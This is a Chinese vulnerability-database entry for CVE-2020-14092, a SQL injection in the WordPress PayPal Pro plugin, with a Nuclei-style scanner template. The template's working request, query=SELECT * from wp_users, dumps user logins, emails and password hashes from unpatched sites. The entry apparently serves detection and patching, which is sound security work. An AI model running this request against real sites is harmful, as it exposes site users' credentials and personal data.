CVE-2020-14092: WordPress PayPal Pro <1.1.65 - SQL Injection

日期: 2025-08-01 | 影响软件: WordPress PayPal Pro | POC: 已公开

漏洞描述

WordPress PayPal Pro plugin before 1.1.65 is susceptible to SQL injection via the 'query' parameter which allows for any unauthenticated user to perform SQL queries with the results output to a web page in JSON format.

PoC代码[已公开]

id: CVE-2020-14092

info:
  name: WordPress PayPal Pro <1.1.65 - SQL Injection
  author: princechaddha
  severity: critical
  description: WordPress PayPal Pro plugin before 1.1.65 is susceptible to SQL injection via the 'query' parameter which allows for any unauthenticated user to perform SQL queries with the results output to a web page in JSON format.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
  remediation: |
    Update to the latest version of the WordPress PayPal Pro plugin (1.1.65 or higher) to mitigate the SQL Injection vulnerability.
  reference:
    - https://wpscan.com/vulnerability/10287
    - https://wordpress.dwbooster.com/forms/payment-form-for-paypal-pro
    - https://nvd.nist.gov/vuln/detail/CVE-2020-14092
    - https://wordpress.org/plugins/payment-form-for-paypal-pro/#developers
    - https://wpvulndb.com/vulnerabilities/10287
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-14092
    cwe-id: CWE-89
    epss-score: 0.86885
    epss-percentile: 0.99397
    cpe: cpe:2.3:a:ithemes:paypal_pro:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: ithemes
    product: paypal_pro
    framework: wordpress
  tags: cve,cve2020,wp-plugin,sqli,paypal,wpscan,wordpress,ithemes

http:
  - method: GET
    path:
      - "{{BaseURL}}/?cffaction=get_data_from_database&query=SELECT%20*%20from%20wp_users"

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "text/html"

      - type: word
        part: body
        words:
          - '"user_login"'
          - '"user_email"'
          - '"user_pass"'
          - '"user_activation_key"'
        condition: and

      - type: status
        status:
          - 200
# digest: 490a00463044022004c4bf37caab2f140e26a831b94c4c6f69a2da70f8afd12f8b3b13c3b3bdce3202203a00c72d18309504b051100f0e2647dacc1a59438100fca0e04885394fddd1b6:922c64590222798bb761d5b6d8e72950

相关漏洞推荐